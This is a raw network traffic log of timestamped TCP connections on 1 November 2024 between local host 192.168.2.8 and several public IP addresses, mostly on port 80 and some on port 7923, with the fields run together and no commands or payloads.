                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.283673048 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.283883095 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.289797068 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.291366100 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.329498053 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.329664946 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.335005999 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.335076094 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.346626997 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352458000 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352535963 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352694035 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352716923 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.357701063 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.358259916 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.467418909 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472524881 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472599983 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472774029 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472798109 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.477592945 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.477663994 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.195267916 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.195533991 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.200665951 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.202168941 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.313328028 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.313810110 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.318960905 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.319029093 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.401756048 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406734943 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406821966 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406971931 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406971931 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.411730051 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.411741972 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.650031090 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655145884 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655272007 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655602932 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655658960 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.660595894 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.660626888 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.080696106 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.081298113 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.086608887 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.086662054 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.098723888 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.103693008 CET805018935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.103758097 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.103900909 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.103931904 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.108678102 CET805018935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.108699083 CET805018935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.616285086 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.616453886 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.621897936 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.621953964 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.888972998 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.894094944 CET805019018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.894520998 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.894731998 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.894851923 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.899522066 CET805019018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.899653912 CET805019018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.942898989 CET805018935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.943406105 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.948635101 CET805018935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.948930025 CET5018980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.969069004 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.973995924 CET805019134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.974440098 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.974663973 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.974838972 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.979464054 CET805019134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.979603052 CET805019134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.719378948 CET805019018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.719877958 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.726639032 CET805019018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.727045059 CET5019080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.808439016 CET805019134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.811795950 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.818027020 CET805019134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.819705009 CET5019180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.917912006 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.920171022 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.922841072 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.922904015 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.923047066 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.923058033 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.924983978 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.927697897 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.927829027 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.927851915 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.927856922 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.927866936 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.932630062 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.932660103 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:38.362317085 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:38.800026894 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169790030 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169826984 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169836044 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169876099 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169884920 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169908047 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.169960976 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.171783924 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.171794891 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.172573090 CET5019380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.177566051 CET805019344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.205089092 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.210058928 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.210208893 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.210882902 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.210985899 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.215765953 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.215797901 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.391201019 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.391422033 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.396944046 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.398384094 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.436954021 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.439810038 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.445437908 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.518237114 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.524172068 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.590153933 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595283031 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595582008 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595698118 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595714092 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.600689888 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.600702047 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.674500942 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.679461956 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.861948013 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.957726002 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.957994938 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.959728003 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.960453033 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.964699984 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.965053082 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.970526934 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.986938000 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.991746902 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.050311089 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.051785946 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.056873083 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.059696913 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.069464922 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.074398041 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075701952 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075829983 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075855970 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.080672026 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.080682993 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.143199921 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.148073912 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.218338013 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.229253054 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.229321003 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.231794119 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.236670971 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.562089920 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.562370062 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.563649893 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.568708897 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.568793058 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.573580027 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.919962883 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.920444012 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.925579071 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.925807953 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.935791016 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.940623999 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.941833019 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.941970110 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.942034960 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.946793079 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.946846962 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.025571108 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.026000023 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.031543016 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.034085035 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.139091969 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.143992901 CET805019818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.144071102 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.144229889 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.144272089 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.149029016 CET805019818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.149045944 CET805019818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.774765968 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.775768995 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.781290054 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.783723116 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.791256905 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.796176910 CET805019934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.799710035 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.799833059 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.799860001 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.803211927 CET805019818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.803344011 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.804636002 CET805019934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.804647923 CET805019934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.808383942 CET805019818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.808433056 CET5019880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.194252968 CET5020080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.199145079 CET805020044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.199600935 CET5020080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.200398922 CET5020080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.200438976 CET5020080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.205290079 CET805020044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.205302000 CET805020044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.635418892 CET805019934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.637809038 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.643065929 CET805019934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.645823956 CET5019980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.830806017 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.835633993 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.835695028 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.835830927 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.835851908 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.840615034 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.840626955 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.861061096 CET805020044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.862575054 CET5020080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.867805958 CET805020044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.869779110 CET5020080192.168.2.844.221.84.105
